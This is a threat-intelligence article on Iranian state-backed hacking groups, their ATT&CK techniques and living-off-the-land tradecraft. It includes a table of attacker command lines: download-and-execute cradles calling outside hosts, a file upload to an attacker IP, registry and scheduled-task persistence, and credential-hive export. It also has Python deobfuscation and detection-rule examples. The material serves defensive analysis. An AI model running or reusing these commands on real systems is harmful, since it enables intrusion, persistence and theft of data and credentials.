Iran’s Cyber Strategy Evolves as State-Backed Hackers Expand Global Reach

Over the past decade, Iran has steadily developed one of the most active and adaptive nation-state cyber ecosystems. Iranian cyber operations blend espionage, disruptive cyberattacks, and influence campaigns, forming a hybrid warfare strategy aligned with geopolitical objectives.

A recent analysis highlights the evolution of Iran’s cyber operations from 2024 through early 2026. The report explores the structure of Iranian cyber organizations, the tactics and techniques they employ, and the strategic shifts driven by escalating regional tensions.

As geopolitical conflict increasingly spills into cyberspace, understanding Iran’s cyber posture is critical for defenders in government, critical infrastructure, and private sector organizations.


Geopolitical Context: Cyber Operations in a Regional Crisis

Between 2024 and March 2026, the geopolitical environment surrounding Iran changed dramatically.

Earlier tensions between Iran and Israel escalated into direct military confrontations, including unprecedented ballistic missile exchanges. At the same time, Iran’s traditional regional proxy network—often referred to as the “Axis of Resistance”—began to fragment after coordinated U.S. and Israeli strikes in early 2026. These developments significantly impacted Iran’s cyber operations and strategic priorities.

Historically, Iranian cyber campaigns have been orchestrated by two primary state institutions:

  • Islamic Revolutionary Guard Corps (IRGC)
  • Ministry of Intelligence and Security (MOIS)

Both organizations oversee cyber units and coordinate with contractor groups and proxy actors. The result is a distributed cyber ecosystem capable of conducting espionage, disruption, and psychological operations across global targets.

Cyber activity frequently intensifies alongside geopolitical conflict, reinforcing Iran’s broader hybrid warfare doctrine.


Iranian Cyber Threat Landscape

Iran’s cyber ecosystem consists of multiple Advanced Persistent Threat (APT) groups with varying capabilities, operational goals, and technical sophistication.

These groups conduct:

  • Cyber espionage
  • Intellectual property theft
  • Critical infrastructure targeting
  • Influence operations
  • Destructive malware attacks

Targets commonly include:

  • Government agencies
  • Energy and oil sectors
  • Defense contractors
  • Media organizations
  • Political institutions

Operations have expanded beyond the Middle East to include the United States, Europe, and other strategic regions.

Command lines the report attributes to individual Iranian threat actors (URLs and addresses as published, several of them defanged):

Threat Actor      Command Line
APT34             powershell.exe -File %APPDATA%\Local\Microsoft\InputPersonalization\TrainedDataStore.ps1
APT35             conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM') DO %f -w 1 $zf='osf.zip';$pd='Biography of Mr.leehu hacohn.pdf';$pdl='Biography of Mr.leehu hacohn.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\Wow" `} ;
APT42             powershell -w 1 "$Pbwpc=(Get-Content -Path '%LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt'); &(gcm "i*x) $Pbwpc"
APT42             copy-item C:/Users/{USER}/AppData/Local/Microsoft/Outlook/@example.com.ost ` $env:APPDATA/[email protected]
APT42             rundll32.exe %WINDIR%\system32\davclnt.dll, DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/[REDACTED].lnk
APT42             powershell -w 1 "$PbwpcDxXtAnaGrsu=(Get-Content -Path %LOCALAPPDATA%\Microsoft\Windows\AutoUpdate\fhgPczTORoCNEDsm.txt); &(gcm i*x)$PbwpcDxXtAnaGrsu"
APT42             start msedge \""hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\";
APT42             Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Renovation' -Value "cmd /c \"for %a in (\"%localappdata%\Microsoft\Internet Explorer\List\*\") do ( start \"\" \"%a\" )\""
APT42             cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d "id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf\" -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\\down.v7bs & call %c:7=% & set b=sta7rt \"\" \"%temp%\\down.v7bs\" & call %b:7=%
APT42             conhost --headless %PUBLIC%\Microsoft.bat
APT42             %LOCALAPPDATA%\Caches\pssuspend.exe -accepteula -nobanner <chrome_pid>
APT42             curl.exe -X POST "https://<FIREBASE-ENDPOINT>.json" -H "Content-Type: application/json" -d "{\"LastUpdatTime\":{\".sv\":\"timestamp\"}}" --ssl-no-revoke"
APT42             powershell -w 1 $pnt=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt); &(gcm "i*x)$pnt
APT42             cmd /c curl --ssl-no-revoke -o vgh.txt https://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
APT42             "%WINDIR%\System32\cmd.exe" /c set hm="cmolbd /c colburl --ssolblno-revoolbke -o vgh.tolbxt https[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt & %%tmolbp%% " & call %%hm:olb=%%
APT42             msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000
APT42             powershell -w 1 "$lb='gBjs';$uq=(invoke-restmethod -UserAgent 'Chrome' 'https://line.completely.workers.dev/aoh52');.(gcm i*ee*)$uq"
Cyber Av3ngers    uname -v > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers    hostname > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers    whoami > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers    date +%Z > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers    uname -r > /tmp/{RANDOM_16_chars}.txt 2>&1
Cyber Av3ngers    curl --http2 --header "accept: application/dns-json" "https://1.1.1.1/dns-query?name=google.com"
Dust Specter      $di='%ALLUSERSPROFILE%\WinWebex';md $di 2>"";$path=$di+'\WinWebex.exe';Add-Type -A System.Net.Http;$c=New-Object System.Net.Http.HttpClient; $c.DefaultRequestHeaders.UserAgent.ParseAdd('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0');[IO.File]::WriteAllBytes($path, $c.GetAsync('https://meetingapp.site/webexdownload').Result.Content.ReadAsByteArrayAsync().Result); $c.Dispose();Register-ScheduledTask -TaskName winWebex -Action (New-ScheduledTaskAction -Execute $path) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 2) -RepetitionDuration ([TimeSpan]::FromDays(9999))) -Settings (New-ScheduledTaskSettingsSet -ExecutionTimeLimit (New-TimeSpan -Seconds 0)) -Force; Start-ScheduledTask -TaskName winWebex;exit;
Dust Specter      "%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe";New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'VLC' -Value '%ALLUSERSPROFILE%\PolGuid\VLC\vlc.exe' -PropertyType String;New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'WingetUI' -Value '%ALLUSERSPROFILE%\PolGuid\WingetUI\WingetUI.exe' -PropertyType String;
Infy              chcp 65001 TaskKill /F /IM 8020 Timeout /T 2 /Nobreak Del /ah
Infy              chcp 65001 TaskKill /F /IM 5268 Timeout /T 2 /Nobreak Del /ah
MuddyWater        "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -w -l -file %ALLUSERSPROFILE%\a.ps1
MuddyWater        "%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"%WINDIR%\TEMP\dlr5lzwp\dlr5lzwp.cmdline"
MuddyWater        "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv
MuddyWater        "%WINDIR%\system32\reg.exe" "%WINDIR%\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv
MuddyWater        netbird.exe setup --setup-key E48E4A70-4CF4-4A77-946B-C8E50A60855A --management-url
MuddyWater        schtasks /create /tn ForceNetbirdRestart
MuddyWater        net localgroup Administrators user /add
MuddyWater        sc config sshd start= auto
MuddyWater        sc config netbird start= delayed-auto
MuddyWater        wmic useraccount where name='user' set passwordexpires=false
MuddyWater        net localgroup Administrateurs user /add
MuddyWater        powershell.exe -WindowStyle Hidden
MuddyWater        net user user Bs@202122 /add
MuddyWater        powershell.exe -Command "Copy-Item -Path %%malware path%% -Destination '%ALLUSERSPROFILE%\Logs' -Force"
MuddyWater        "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149.51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression
MuddyWater        schtasks /create /sc daily /st 09:00 /tn "DailyUpdate" /tr "%PUBLIC%\Downloads\novaservice.exe"
MuddyWater        powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -EncodedCommand [REDACTED]
MuddyWater        $wc = New-Object System.Net.WebClient; $wc.UploadFile("hxxp://143[.]198[.]5[.]41:443/success","%PUBLIC%\downloads\cobe-notes.txt");
MuddyWater        taskkill /IM novaservice.exe
MuddyWater        Start-Process %ALLUSERSPROFILE%\FMAPP.exe -WindowStyle Hidden
MuddyWater        "%PROGRAMFILES%\Microsoft Office\Office16\WINWORD.EXE" /n
MuddyWater        "%WINDIR%\System32\cmd.exe" /c %ALLUSERSPROFILE%\CertificationKit.ini
Parisite          TNC <DC-2 IP> -Port 135
Parisite          ipconfig /all
Parisite          .\SOCKSSrv.exe
Parisite          netstat -nao|findstr 28443
Parisite          ssh 104[.]238[.]191[.]185 -P 443
Parisite          ssh 104[.]238[.]191[.]185 -p 443
Parisite          Enter-PSSession -ComputerName <DC-2 IP>
Parisite          TNC <DC-2 IP> -Port 389
Parisite          netstat -nao|findstr 443
Parisite          cmd
Parisite          .\SOCKSSrv.exe
Parisite          netsh i p a v listenport=443 connecthost=127.0.0.1 connectport=28443
Parisite          netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443
Parisite          netsh i p re all
Parisite          .\443.exe
Parisite          %WINDIR%\System32\drivers\conhost.exe -f conhost.dll -ER --ln --path cmd.exe
Tortoiseshell     cmd.exe /C systeminfo | findstr /I "Domain"
Tortoiseshell     "%PROGRAMFILES%\WinRAR\RAR.exe" a -v1000m -m5 "%PROGRAMFILES%\WinRAR\{COMPANY_NAME}.rar" "C:/Users/{USERNAME}/AppData/Local/Microsoft/Outlook/{TARGET_OST}"
Tortoiseshell     net user DC-01$ P@ssw0rd
Tortoiseshell     %WINDIR%\system32\openssh\ssh.exe [Username]@[IP Address] -p 443 -o ServerAliveInterval=60 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -f -N -R 1070
Tortoiseshell     reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Tortoiseshell     reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Tortoiseshell     SCCM.exe reconfig /target:[REDACTED]

Major Iranian Threat Groups

MuddyWater (Seedworm / Mango Sandstorm)

MuddyWater is believed to operate under Iran’s MOIS and has been active since approximately 2017.

The group primarily focuses on espionage campaigns targeting government and private sector organizations globally.

Typical attack workflow includes:

  1. Spear-phishing emails
  2. Delivery of malicious ZIP files
  3. Execution using native Windows tools
  4. Deployment of backdoors

Their operations rely heavily on PowerShell and native command-line tools so that activity resembles routine administration; the MuddyWater rows in the table above (reg.exe hive saves, sc config, schtasks, net user and net localgroup, a NetBird remote-access client enrolled with a setup key) are typical.

Tools observed in MuddyWater campaigns include:

  • Cobalt Strike
  • PhonyC2
  • MuddyC2Go
  • DarkBeatC2
  • Custom malware such as BugSleep

These tools enable remote access, file exfiltration, screenshot capture, and execution of additional malicious payloads.


APT35 (Charming Kitten / Magic Hound)

APT35 is one of Iran’s most prominent cyber espionage groups.

Active since around 2014, the group focuses on long-term intelligence gathering and surveillance campaigns targeting:

  • Government officials
  • Military organizations
  • Energy companies
  • Media outlets
  • Political campaigns

APT35 relies heavily on social engineering and spear-phishing to gain initial access.

Once inside a network, the group deploys both custom and open-source tools such as:

  • Sponsor
  • Soldier
  • BellaCiao
  • DownPaper
  • Mimikatz
  • PsExec

These tools allow attackers to maintain persistence, escalate privileges, and exfiltrate sensitive data from compromised systems.


Attack Techniques and Tactics

Mapped to the MITRE ATT&CK framework, the techniques Iranian operators use most often are the following. Several of them can be read directly off the command lines in the table above.

The most common techniques observed include:

Initial Access

Phishing remains the dominant entry point.

Key technique:

T1566 – Phishing

Victims are typically tricked into executing malicious attachments or clicking links that lead to credential harvesting or malware downloads.


Execution

Once the victim interacts with malicious content, attackers execute code using command interpreters.

Common techniques:

T1204 – User Execution
T1059 – Command and Scripting Interpreter

PowerShell is particularly favored due to its flexibility and presence on nearly all Windows systems.


Persistence

To maintain long-term access, attackers hook system startup mechanisms.

Typical persistence methods include:

T1547.001 – Registry Run Keys / Startup Folder
T1053.005 – Scheduled Task

Both appear in the table above: APT42 and Dust Specter write HKCU\...\CurrentVersion\Run values that point at payloads under %LOCALAPPDATA% and %ALLUSERSPROFILE%, and Dust Specter and MuddyWater register scheduled tasks (Register-ScheduledTask, schtasks /create) that relaunch the payload on a timer. Either way the malicious script or binary runs again after a reboot or logon without any further user interaction.


Defense Evasion

Iranian threat actors frequently employ techniques to bypass detection.

Examples include:

T1027 – Obfuscated Files or Information
T1140 – Deobfuscate/Decode Files or Information
T1036 – Masquerading

The APT42 rows in the table show the first two at their simplest: junk characters are inserted into curl and start (cu7rl, colburl, sta7rt) and stripped at run time with cmd's %VAR:search=replace% expansion, so the clear-text command never appears in the logged command line of the cmd.exe process (the child curl.exe, if its creation is logged separately, does show the decoded arguments). Masquerading shows up as payloads named for legitimate software (WinWebex.exe, vlc.exe, WingetUI.exe) and as a renamed binary dropped as %WINDIR%\System32\drivers\conhost.exe.
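An added example, not code from the report or from APT42: a small decoder for the cmd.exe substitution idiom described above (set VAR=junk-laced text, then call %VAR:junk=%), run over two command lines constructed from the APT42 rows in the table. The batch-file variant has the hyphen in --ssl-no-revoke restored so that it decodes to the same command as the plain-curl row; plain environment references such as %temp% are left unresolved because their values are host-specific.

```python
"""Expand cmd.exe's `set VAR=... & call %VAR:SEARCH=REPLACE%` obfuscation.

Added example (not from the report). cmd performs %VAR:SEARCH=REPLACE%
expansion when the `call` line is parsed, which is how the junk characters
('7', 'olb') inserted into curl/start disappear before execution.
"""
import re

# `set NAME=VALUE`: cmd keeps everything after '=' verbatim, quotes included
SET_RE = re.compile(r'^set\s+([^=\s]+)=(.*)$', re.I | re.S)
# %NAME:SEARCH=REPLACE%  or  %%NAME:SEARCH=REPLACE%% inside a .bat file
SUBST_RE = re.compile(r'%%?([^%:=\s]+):([^=%]+)=([^%]*)%%?')
# launcher prefix: `cmd.exe /c` or `"C:\...\cmd.exe" /c`
CMD_PREFIX_RE = re.compile(r'^"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)


def split_unquoted(line: str, sep: str = '&') -> list[str]:
    """Split on `&` outside double quotes; cmd has no backslash escapes."""
    parts, buf, in_quotes = [], [], False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == sep and not in_quotes:
            parts.append(''.join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append(''.join(buf).strip())
    return [p for p in parts if p]


def expand(segment: str, variables: dict[str, str]) -> str:
    """Resolve every %VAR:SEARCH=REPLACE% against variables set earlier."""
    def subst(m: re.Match) -> str:
        name, search, replace = m.group(1).lower(), m.group(2), m.group(3)
        if name not in variables:
            return m.group(0)  # unknown variable: leave the reference visible
        return variables[name].replace(search, replace)
    return SUBST_RE.sub(subst, segment)


def decode(cmdline: str) -> list[str]:
    """Return the commands that actually run, in order, after expansion."""
    variables: dict[str, str] = {}
    executed: list[str] = []
    for seg in split_unquoted(CMD_PREFIX_RE.sub('', cmdline.strip())):
        m = SET_RE.match(seg)
        if m:
            variables[m.group(1).lower()] = m.group(2)
            continue
        seg = re.sub(r'^call\s+', '', seg, flags=re.I)
        # a doubled %% is a single literal % once a batch file is parsed
        executed.append(expand(seg, variables).replace('%%', '%'))
    return executed


# Constructed samples modelled on the APT42 rows (quotes as typed on the
# command line, URLs defanged as in the table); not captured telemetry.
APT42_DIGIT_INSERTION = (
    r'cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -s -d "id=CgYEFk&Prog=2_Mal_vbs.txt&WH=Form.pdf" '
    r'-X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\down.v7bs & call %c:7=% '
    r'& set b=sta7rt "" "%temp%\down.v7bs" & call %b:7=%'
)
APT42_BATCH_VARIANT = (
    r'"C:\Windows\System32\cmd.exe" /c set hm="cmolbd /c colburl --ssolbl-no-revoolbke -o vgh.tolbxt '
    r'https[://]linolbe[.]complolbetely[.]workolbers[.]deolbv/aoh5 & rename vgh.tolbxt temolbp.baolbt '
    r'& %%tmolbp%%" & call %%hm:olb=%%'
)

if __name__ == '__main__':
    for sample in (APT42_DIGIT_INSERTION, APT42_BATCH_VARIANT):
        for cmd in decode(sample):
            print(cmd)
```

The quotes around the decoded batch-file command are part of the variable's value because `set hm="..."` stores them; the decoder reports what cmd sees rather than guessing how it will re-parse the quoted line. Because `&` is split only outside quotes, the `&`-separated POST body in the first sample survives intact.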


Credential Access

Attackers often attempt to steal credentials to expand their control across the network.

Common techniques include:

T1555.003 – Credentials from Web Browsers
T1003.001 – OS Credential Dumping: LSASS Memory
T1003.004 – OS Credential Dumping: LSA Secrets

Browser credential theft in the table takes two forms: APT42 suspends the running Chrome process with Sysinternals pssuspend.exe, and launches msedge.exe with --remote-debugging-port so that a local script can pull cookies and saved logins through the DevTools protocol. MuddyWater's reg.exe save HKLM\SYSTEM exports the hive that holds the boot key needed to decrypt SAM and LSA secrets offline, and Mimikatz, listed among APT35's tools, reads authentication data directly from LSASS memory.


Discovery and Lateral Movement

After gaining credentials, attackers map the network and move laterally.

Typical discovery commands include:

whoami
ipconfig
systeminfo

Common techniques:

T1082 – System Information Discovery
T1083 – File and Directory Discovery
T1021 – Remote Services (RDP, SMB/Windows admin shares, WinRM)

In the Parisite rows above this looks like Test-NetConnection (TNC) against a domain controller on ports 135 and 389, followed by Enter-PSSession to the same host over WinRM, with a local SOCKS server and a netsh portproxy rule on port 443 forwarding into an SSH session to an external address. These actions help attackers identify high-value systems and expand their access.


Data Collection and Exfiltration

Before leaving a compromised environment, attackers gather sensitive information and exfiltrate it.

Key techniques include:

T1560 – Archive Collected Data
T1041 – Exfiltration Over C2 Channel
T1071.001 – Application Layer Protocol: Web Protocols

Data is often compressed and transmitted through command-and-control servers using standard web protocols to blend with legitimate traffic. The Tortoiseshell row shows the collection step, WinRAR packing a user's Outlook OST mailbox into 1000 MB volumes, and the MuddyWater row shows the upload, WebClient.UploadFile to a server on port 443. Note that the latter is plain HTTP on a TLS port, which blends in only against port-based filtering; a proxy that inspects the protocol sees clear-text HTTP.


Living-Off-the-Land: A Core Operational Strategy

One of the defining characteristics of Iranian cyber operations is the heavy use of Living-Off-the-Land Binaries (LOLBins).

Instead of deploying obvious malware, attackers leverage legitimate Windows utilities already present on the system.

Examples include:

  • PowerShell
  • Cmd (including conhost --headless as a console-less launcher)
  • Regsvr32 and Odbcconf (APT35 registers a DLL with odbcconf /a {regsvr ...})
  • Mshta
  • Rundll32 (APT42 calls the DavSetCookie export of davclnt.dll to fetch a payload over WebDAV)
  • curl.exe, netsh, reg.exe, schtasks and wmic for download, port forwarding, hive export, persistence and account tampering

This approach provides several advantages:

  1. Reduces the need to drop custom malware
  2. Blends malicious activity with legitimate system operations
  3. Evades traditional signature-based security controls

By weaponizing standard administrative tools, Iranian threat actors significantly complicate detection efforts.
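An added example, not code from the report or from any of the groups it describes, for the command-line table above and the living-off-the-land discussion here: a small rule set distilled from the observed command lines, run over constructed process-creation events. The events, paths, host names and the 203.0.113.10 address are placeholders modelled on the table plus benign administration noise, not real telemetry, and the rule names and ATT&CK tags are this example's own.

```python
"""Hunt over process-creation command lines for the tradecraft in the table.

Added example (not from the report). Each rule is a regex distilled from one
or more observed command lines; the events are constructed, not captured.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str
    pattern: re.Pattern


def rule(name: str, technique: str, regex: str) -> Rule:
    return Rule(name, technique, re.compile(regex, re.IGNORECASE))


RULES = [
    # APT35/APT42 hide the console of a child cmd.exe behind conhost --headless
    rule("headless conhost launcher", "T1059.003", r'\bconhost(\.exe)?\s+--headless\b'),
    # FOR /F over `set | findstr PSM` splits PSModulePath on 's' and '\' and takes token 4,
    # which on a default install is the word PowerShell, so the interpreter is started
    # without its name ever appearing in the command line
    rule("PowerShell name derived from PSModulePath", "T1027", r'findstr\s+PSM\b'),
    # &(gcm i*x) / .(gcm i*ee*) resolve Invoke-Expression by wildcard instead of naming it
    rule("Invoke-Expression via Get-Command wildcard", "T1059.001", r'\(\s*gcm\s+"?i\*'),
    # set VAR=cu7rl ... & call %VAR:7=% strips junk at run time; the curl rule below
    # cannot see through it, only the child process's own command line can
    rule("cmd variable-substitution obfuscation", "T1140", r'%%?\w+:[^=%]+=[^%]*%'),
    rule("curl with revocation checking disabled", "T1105", r'\bcurl(\.exe)?\b.*--ssl-no-revoke'),
    rule("WebDAV fetch through davclnt.dll", "T1105", r'davclnt\.dll\s*,\s*DavSetCookie'),
    # a browser with a DevTools port open lets a local script read cookies and saved logins
    rule("browser launched with remote debugging", "T1555.003", r'--remote-debugging-port=\d+'),
    # netsh accepts unambiguous prefixes: "i p a v" == "interface portproxy add v4tov4"
    rule("netsh portproxy forward", "T1090.001", r'\bnetsh\s+i\w*\s+p\w*\s+a\w*\s+v\w*'),
    rule("run-key or scheduled-task persistence", "T1547.001",
         r'(-ItemProperty\b.*\\CurrentVersion\\Run(Once)?\b|\bschtasks(\.exe)?\s+/create\b|Register-ScheduledTask\b)'),
    rule("user added to local admins (localized group names too)", "T1098",
         r'\bnet\s+localgroup\s+"?(administrators|administrateurs|administratoren)"?\s+\S+\s+/add'),
    rule("SYSTEM/SAM/SECURITY hive exported", "T1003.002", r'\breg(\.exe)?"?\s+save\s+HKLM\\(SYSTEM|SAM|SECURITY)\b'),
    rule("RDP connection history wiped", "T1070",
         r'\breg(\.exe)?"?\s+delete\s+"?HK(CU|EY_CURRENT_USER)\\Software\\Microsoft\\Terminal Server Client'),
    rule("Outlook OST archived with RAR", "T1560.001", r'\brar(\.exe)?"?\s+a\b.*\.ost\b'),
    rule("reverse SSH tunnel", "T1572", r'\bssh(\.exe)?"?\s.*\s-R\s+\d+'),
]

# Constructed events (id, command line): 1-13 modelled on the table, 14-16 benign noise.
EVENTS = [
    (1, "conhost --headless cmd /c FOR /F \"delims=s\\ tokens=4\" %f IN ('set^|findstr PSM') DO %f -w 1 $zf='osf.zip'"),
    (2, r"powershell -w 1 $p=(Get-Content -Path %APPDATA%\Microsoft\documentLoger.txt); &(gcm i*x)$p"),
    (3, r"cmd.exe /c set c=cu7rl --s7sl-no-rev7oke -X PO7ST hxxps://prism-west-candy[.]glitch[.]me/Down -o %temp%\down.v7bs & call %c:7=%"),
    (4, r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie datadrift.somee.com@SSL https://datadrift.somee.com/aoh5/x.lnk"),
    (5, r"msedge.exe --no-sandbox --remote-debugging-port=9222 --remote-allow-origins=ws://localhost:9222 --window-position=-32000,-32000"),
    (6, r"netsh i p a v listenport=443 connectaddress=127.0.0.1 connectport=28443"),
    (7, r"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Renovation' -Value 'cmd /c ...'"),
    (8, r"net localgroup Administrateurs user /add"),
    (9, r'"C:\Windows\system32\reg.exe" save HKLM\SYSTEM SystemBkup.hiv'),
    (10, r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f'),
    (11, r'"C:\Program Files\WinRAR\RAR.exe" a -v1000m -m5 "C:\Program Files\WinRAR\corp.rar" "C:/Users/u/AppData/Local/Microsoft/Outlook/u@corp.ost"'),
    (12, r"C:\Windows\system32\openssh\ssh.exe user@203.0.113.10 -p 443 -o StrictHostKeyChecking=no -f -N -R 1070"),
    (13, r"cmd /c curl --ssl-no-revoke -o vgh.txt hxxps://line[.]completely[.]workers[.]dev/aoh5 & rename vgh.txt temp.bat & %tmp%"),
    (14, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    (15, r"netsh interface show interface"),
    (16, r"curl.exe -sS https://intranet.example.com/status"),
]


def scan(events: list[tuple[int, str]]) -> list[tuple[int, str, str]]:
    """Return (event id, rule name, technique) for every rule that fires."""
    return [(eid, r.name, r.technique)
            for eid, cmdline in events for r in RULES if r.pattern.search(cmdline)]


def hits_by_event(events: list[tuple[int, str]]) -> dict[int, list[str]]:
    """Group firing rule names by event id; events with no hit are absent."""
    grouped: dict[int, list[str]] = {}
    for eid, name, _ in scan(events):
        grouped.setdefault(eid, []).append(name)
    return grouped


if __name__ == "__main__":
    for eid, name, technique in scan(EVENTS):
        print(f"event {eid:2d}  {technique:10s}  {name}")
```

Event 3 is the instructive one: the obfuscated cmd.exe line fires only the substitution rule, never the curl rule, which is why process-creation logging of the child curl.exe (where the decoded arguments appear) matters more than any signature on the parent. The localized group names in the net localgroup rule come straight from the MuddyWater rows, which show both Administrators and Administrateurs.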


The Role of Hacktivists and Proxy Groups

In addition to state-sponsored APT groups, Iran also leverages loosely affiliated hacktivist organizations.

These groups conduct:

  • Distributed denial-of-service (DDoS) attacks
  • Website defacement
  • Data leaks
  • Psychological and information operations

Hacktivist activity often intensifies during geopolitical crises and may serve as a force multiplier for state cyber campaigns.


Strategic Outlook

Iran’s cyber capabilities demonstrate a mature and evolving threat ecosystem.

Key trends shaping the future include:

  1. Increased reliance on living-off-the-land techniques
  2. Integration of cyber operations with military conflict
  3. Greater coordination between state actors and hacktivist groups
  4. Targeting of critical infrastructure and strategic industries

Even as geopolitical dynamics fluctuate, Iran’s cyber program remains a significant and persistent global threat.

Organizations operating in high-value sectors must assume they are potential targets and invest in proactive detection, threat hunting, and defensive resilience.


Conclusion

Iran has transformed cyber operations into a central component of its national security strategy.

Through a combination of advanced threat groups, proxy actors, and sophisticated tradecraft, Iranian cyber operators continue to conduct espionage and disruption campaigns across the globe.

Their emphasis on stealth techniques—particularly living-off-the-land operations—demonstrates an understanding of modern enterprise environments and defensive tooling.

For defenders, the key takeaway is clear:
Traditional security controls alone are insufficient against adversaries who weaponize legitimate system tools.

Continuous monitoring, behavioral detection, and threat intelligence integration will be critical in defending against Iranian cyber operations in the years ahead.